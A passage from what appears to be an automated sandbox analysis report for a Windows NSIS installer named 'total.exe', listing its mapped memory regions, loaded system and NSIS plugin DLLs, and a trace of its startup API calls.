"pagefile_0x00000000004b0000" filename = "" Region: id = 936 start_va = 0x650000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 937 start_va = 0x76050000 end_va = 0x7611bfff entry_point = 0x76050000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" 
(normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 938 start_va = 0x77790000 end_va = 0x777effff entry_point = 0x77790000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 939 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 940 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 941 start_va = 0x660000 end_va = 0x7e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 942 start_va = 0x7f0000 end_va = 0x1beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 943 start_va = 0x1c70000 end_va = 0x1c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 944 start_va = 0x75540000 end_va = 0x755bffff entry_point = 0x75540000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 945 start_va = 0x1c80000 end_va = 0x1dcffff entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 946 start_va = 0x75120000 end_va = 0x75136fff entry_point = 0x75120000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 947 start_va = 0x75680000 end_va = 0x7568afff entry_point = 0x75680000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 948 start_va = 0x76130000 end_va = 0x762ccfff entry_point = 0x76130000 region_type = mapped_file name = "setupapi.dll" filename = 
"\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 949 start_va = 0x76020000 end_va = 0x76046fff entry_point = 0x76020000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 950 start_va = 0x77810000 end_va = 0x7789efff entry_point = 0x77810000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 951 start_va = 0x75c70000 end_va = 0x75c81fff entry_point = 0x75c70000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 952 start_va = 0x1b0000 end_va = 0x1b6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 953 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 954 start_va = 0x1dd0000 end_va = 0x21c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001dd0000" filename = "" Region: id = 955 start_va = 0x750d0000 end_va = 0x7511bfff entry_point = 0x750d0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 956 start_va = 0x74fd0000 end_va = 0x750c4fff entry_point = 0x74fd0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 957 start_va = 0x75520000 end_va = 0x75532fff entry_point = 0x75520000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 958 start_va = 0x74f90000 end_va = 0x74fcbfff entry_point = 
0x74f90000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 959 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x1d0000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 960 start_va = 0x77570000 end_va = 0x775f2fff entry_point = 0x77570000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 961 start_va = 0x75760000 end_va = 0x75768fff entry_point = 0x75760000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 962 start_va = 0x75750000 end_va = 0x75754fff entry_point = 0x75750000 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 963 start_va = 0x1c80000 end_va = 0x1d5efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c80000" filename = "" Region: id = 964 start_va = 0x1d90000 end_va = 0x1dcffff entry_point = 0x0 region_type = private name = "private_0x0000000001d90000" filename = "" Region: id = 965 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 966 start_va = 0x21d0000 end_va = 0x249efff entry_point = 0x21d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 967 start_va = 0x1f0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 968 start_va = 0x75320000 end_va = 0x754bdfff 
entry_point = 0x75320000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 969 start_va = 0x280000 end_va = 0x280fff entry_point = 0x280000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 970 start_va = 0x290000 end_va = 0x291fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 971 start_va = 0x1bf0000 end_va = 0x1c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001bf0000" filename = "" Region: id = 972 start_va = 0x24a0000 end_va = 0x259ffff entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 973 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 974 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 975 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 976 start_va = 0x75720000 end_va = 0x75740fff entry_point = 0x75720000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 977 start_va = 0x778a0000 end_va = 0x778e4fff entry_point = 0x778a0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 978 start_va = 0x2b0000 end_va = 
0x2b3fff entry_point = 0x2b0000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 979 start_va = 0x3d0000 end_va = 0x3ecfff entry_point = 0x3d0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db") Region: id = 980 start_va = 0x1c30000 end_va = 0x1c6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c30000" filename = "" Region: id = 981 start_va = 0x25a0000 end_va = 0x269ffff entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 982 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 983 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 984 start_va = 0x26a0000 end_va = 0x27a0fff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 985 start_va = 0x26a0000 end_va = 0x27a0fff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 986 start_va = 0x26a0000 end_va = 0x27a0fff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 987 start_va = 0x26a0000 end_va = 0x27a0fff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 988 start_va = 0x26a0000 end_va = 
0x27a0fff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 989 start_va = 0x26a0000 end_va = 0x27a0fff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 990 start_va = 0x26a0000 end_va = 0x27a0fff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 991 start_va = 0x2b0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 992 start_va = 0x2b0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 993 start_va = 0x75710000 end_va = 0x75715fff entry_point = 0x75710000 region_type = mapped_file name = "system.dll" filename = "\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll") Region: id = 994 start_va = 0x75700000 end_va = 0x75704fff entry_point = 0x75700000 region_type = mapped_file name = "userinfo.dll" filename = "\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\UserInfo.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\userinfo.dll") Region: id = 995 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 996 start_va = 0x756f0000 end_va = 0x756f4fff entry_point = 0x756f0000 region_type = mapped_file name = "userinfo.dll" filename = "\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\UserInfo.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\userinfo.dll") Region: id = 997 start_va = 0x75700000 end_va = 0x75704fff entry_point = 0x75700000 region_type = mapped_file name = "nsexec.dll" filename = "\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll" (normalized: 
"c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\nsexec.dll") Region: id = 1049 start_va = 0x2b0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 1050 start_va = 0x2b0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 1051 start_va = 0x756f0000 end_va = 0x756f4fff entry_point = 0x756f0000 region_type = mapped_file name = "nsexec.dll" filename = "\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\nsexec.dll") Thread: id = 54 os_tid = 0x850 [0146.237] SetErrorMode (uMode=0x8001) returned 0x0 [0146.237] GetVersion () returned 0x1db10106 [0146.239] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x75c90000 [0146.239] GetProcAddress (hModule=0x75c90000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0146.239] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0146.239] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\UXTHEME.dll") returned 12 [0146.239] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\UXTHEME.dll", hFile=0x0, dwFlags=0x8) returned 0x75540000 [0147.084] lstrlenA (lpString="UXTHEME") returned 7 [0147.084] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.084] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\USERENV.dll") returned 12 [0147.084] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\USERENV.dll", hFile=0x0, dwFlags=0x8) returned 0x75120000 [0147.801] lstrlenA (lpString="USERENV") returned 7 [0147.801] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.801] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\SETUPAPI.dll") 
returned 13 [0147.801] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\SETUPAPI.dll", hFile=0x0, dwFlags=0x8) returned 0x76130000 [0150.240] lstrlenA (lpString="SETUPAPI") returned 8 [0150.240] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0150.240] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\APPHELP.dll") returned 12 [0150.240] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\APPHELP.dll", hFile=0x0, dwFlags=0x8) returned 0x750d0000 [0150.743] lstrlenA (lpString="APPHELP") returned 7 [0150.743] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0150.743] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\PROPSYS.dll") returned 12 [0150.743] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\PROPSYS.dll", hFile=0x0, dwFlags=0x8) returned 0x74fd0000 [0151.424] lstrlenA (lpString="PROPSYS") returned 7 [0151.424] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.425] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\DWMAPI.dll") returned 11 [0151.425] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\DWMAPI.dll", hFile=0x0, dwFlags=0x8) returned 0x75520000 [0151.855] lstrlenA (lpString="DWMAPI") returned 6 [0151.855] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.855] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\CRYPTBASE.dll") returned 14 [0151.855] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\CRYPTBASE.dll", hFile=0x0, dwFlags=0x8) returned 0x75880000 [0151.856] lstrlenA (lpString="CRYPTBASE") returned 9 [0151.856] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.856] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: 
param_1="\\OLEACC.dll") returned 11 [0151.857] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\OLEACC.dll", hFile=0x0, dwFlags=0x8) returned 0x74f90000 [0152.728] lstrlenA (lpString="OLEACC") returned 6 [0152.728] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0152.728] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\CLBCATQ.dll") returned 12 [0152.729] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\CLBCATQ.dll", hFile=0x0, dwFlags=0x8) returned 0x77570000 [0153.333] lstrlenA (lpString="CLBCATQ") returned 7 [0153.333] GetModuleHandleA (lpModuleName="VERSION") returned 0x0 [0153.333] GetSystemDirectoryA (in: lpBuffer=0x18fcc0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.333] wsprintfA (in: param_1=0x18fcd3, param_2="%s%s.dll" | out: param_1="\\VERSION.dll") returned 12 [0153.333] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\VERSION.dll", hFile=0x0, dwFlags=0x8) returned 0x75760000 [0155.069] GetProcAddress (hModule=0x75760000, lpProcName="GetFileVersionInfoA") returned 0x75761ced [0155.069] GetModuleHandleA (lpModuleName="SHFOLDER") returned 0x0 [0155.069] GetSystemDirectoryA (in: lpBuffer=0x18fcc0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.069] wsprintfA (in: param_1=0x18fcd3, param_2="%s%s.dll" | out: param_1="\\SHFOLDER.dll") returned 13 [0155.069] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\SHFOLDER.dll", hFile=0x0, dwFlags=0x8) returned 0x75750000 [0155.132] GetProcAddress (hModule=0x75750000, lpProcName="SHGetFolderPathA") returned 0x75751528 [0155.132] GetModuleHandleA (lpModuleName="SHLWAPI") returned 0x75920000 [0155.133] GetProcAddress (hModule=0x75920000, lpProcName=0x1b5) returned 0x7593bee6 [0155.133] IsOS (dwOS=0x1e) returned 1 [0155.159] InitCommonControls () [0155.159] OleInitialize (pvReserved=0x0) returned 0x0 [0155.211] SHGetFileInfoA (in: pszPath="", 
dwFileAttributes=0x0, psfi=0x18fe2c, cbFileInfo=0x160, uFlags=0x0 | out: psfi=0x18fe2c) returned 0x1 [0157.821] lstrcpynA (in: lpString1=0x42ec00, lpString2="NSIS Error", iMaxLength=1024 | out: lpString1="NSIS Error") returned="NSIS Error" [0157.821] GetCommandLineA () returned="\"C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe\" " [0157.821] lstrcpynA (in: lpString1=0x435000, lpString2="\"C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe\" ", iMaxLength=1024 | out: lpString1="\"C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe\" ") returned="\"C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe\" " [0157.823] GetTempPathA (in: nBufferLength=0x400, lpBuffer=0x436400 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned 0x25 [0157.828] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 36 [0157.828] lstrcatA (in: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" [0157.828] CreateDirectoryA (lpPathName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0157.828] GetLastError () returned 0xb7 [0157.828] GetTickCount () returned 0x2fd9f [0157.828] GetTempFileNameA (in: lpPathName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\", lpPrefixString="nsd", uUnique=0x0, lpTempFileName=0x436000 | out: lpTempFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nsdFD9F.tmp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nsdfd9f.tmp")) returned 0xfd9f [0157.829] DeleteFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nsdFD9F.tmp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nsdfd9f.tmp")) returned 1 [0157.829] GetTickCount () returned 0x2fd9f [0157.829] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x436c00, nSize=0x400 | out: 
lpFilename="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe")) returned 0x2e [0157.829] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe")) returned 0x2020 [0157.829] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0x174 [0157.830] lstrcpynA (in: lpString1=0x435c00, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0157.830] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned 46 [0157.830] lstrcpynA (in: lpString1=0x437000, lpString2="total.exe", iMaxLength=1024 | out: lpString1="total.exe") returned="total.exe" [0157.830] GetFileSize (in: hFile=0x174, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc9298 [0157.830] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.830] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: 
hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 
